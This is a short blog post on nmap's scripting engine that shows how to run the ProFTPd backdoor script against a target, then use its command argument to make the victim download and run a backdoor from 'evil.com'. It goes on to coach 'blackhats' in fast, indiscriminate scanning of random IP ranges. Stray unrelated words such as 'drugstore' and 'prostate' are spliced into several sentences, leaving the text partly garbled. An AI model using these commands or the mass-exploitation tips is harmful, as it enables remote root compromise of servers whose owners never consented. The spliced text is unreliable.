Nmap is not just limited to scanning and host-OS/service version detection and such, drugstore it also features an AWESOME scripting engine (the NSE) which uses LUA for its scripts. I hope to cover many “fun” uses of nmap’s scripting engine over the next while, though this post is going to be a bit… Edgier and more “evil” in a sense. Also VITALLY useful and important for those of you hunting down backdoored boxes!!
Every so often someone pops an open source projects SVN or such, treatment and backdoors the source code. This source code then finds its way onto potentially millions of systems, depending on if/when the breach is detected, or the backdoor is noticed. Sometimes, someone writes an nmap script to scan for such compromised systems, and, god forbid, even exploit them!
We will be showing off the following three scripts in this post, prostate and using it as a primer for using nmap’s scripts. (I will only be giving demo usage of one, the other two are the same and are left to the reader as an exercise.)
These scripts are intended to locate backdoored installations of ProFTPd, vsFTPd, and UnrealIRCd, respectively.
For the example, we will use: “ftp-proftpd-backdoor.nse”
This script is intended to locate backdoored installations of ProFTPd – OSVDB-ID 69562 – and tests them using the “id” command. Please note, this is regarded as a “remote root” vulnerability and was (And is) actively exploited in the wild.
root@bha:~# nmap —script ftp-proftpd-backdoor victim.tld
This simply tests for the vulnerability, using all defaults. Nothing too special, but VERY useful for quickly testing.
Using as an exploit!
This script takes an arguement that allows you to specify a custom command to run on the vulnerable system, which is VERY useful during a penetration test!
root@bha:~# nmap —script ftp-proftpd-backdoor —script-args ftp-proftpd-backdoor.cmd=”wget http://evil.com/backdoor.pl & perl backdoor.pl” victim.tld
Please note the —script-args followed by the arguement (arg=var format) showing what command to run. In this example we have it forcing the vulnerable host to download and run a backdoor. (Yes, another one. This time maybe a reverse shell, or a loader for something like Jynx Rootkit…).
Ok. Now for the real blackhats in the audience… Yes, you can scan ranges with this. Just replace target.tld with your standard CIDR range specifier… OR… For those who are less discriminate, the -iR flag and not bothering to specify a target range will simply scan IP’s at random. Further optimizations include the -p21 (only port 21) arguement, the -T5 (Insane scan speed) and -P0 (Don’t waste my time pinging!) arguements…
The other two are similar. To get information on them (an exercise best left to the reader), perhaps the following may be of assistance:
root@bha:~# nmap —script-help ftp-proftpd-backdoor
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-05-16 00:41 IST
Categories: exploit intrusive malware vuln
Tests for the presence of the ProFTPD 1.3.3c backdoor reported as OSVDB-ID 69562. This script attempts to exploit the backdoor using the innocuous
id command by default, but that can be changed with the
ftp-proftpd-backdoor.cmd script argument.
See? You can ask for help! Just pass the name of the script to nmap, and it will help you out using the nsedoc engine
Another challenge that I put out there for any aspiring evil geniuses: How about using all three scripts AT ONCE? Optimized? It CAN be done, and maybe I will write about it.
If you figure out what I am talking about, toss the optimized strings in a comment
// I know I posted this on my Tumblr, yeah, I am migrating content.